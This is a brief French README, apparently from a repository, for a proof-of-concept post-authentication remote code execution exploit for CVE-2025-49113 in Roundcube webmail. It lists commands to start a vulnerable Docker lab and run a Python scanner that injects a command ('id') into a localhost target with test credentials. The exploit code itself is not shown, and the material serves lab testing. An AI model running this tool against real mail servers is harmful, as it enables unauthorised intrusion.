
Preuve de concept d'exécution de code à distance post-authentification pour CVE-2025-49113 dans Roundcube webmail. Inclut un environnement Docker vulnérable et un scanner Python pour tester l'injection de commandes.
cd Stand
docker-compose up -d
cd PoC/src
python3 scanner.py --target http://localhost:9000 --username test --password test --command "id"
test / testhttp://localhost:9000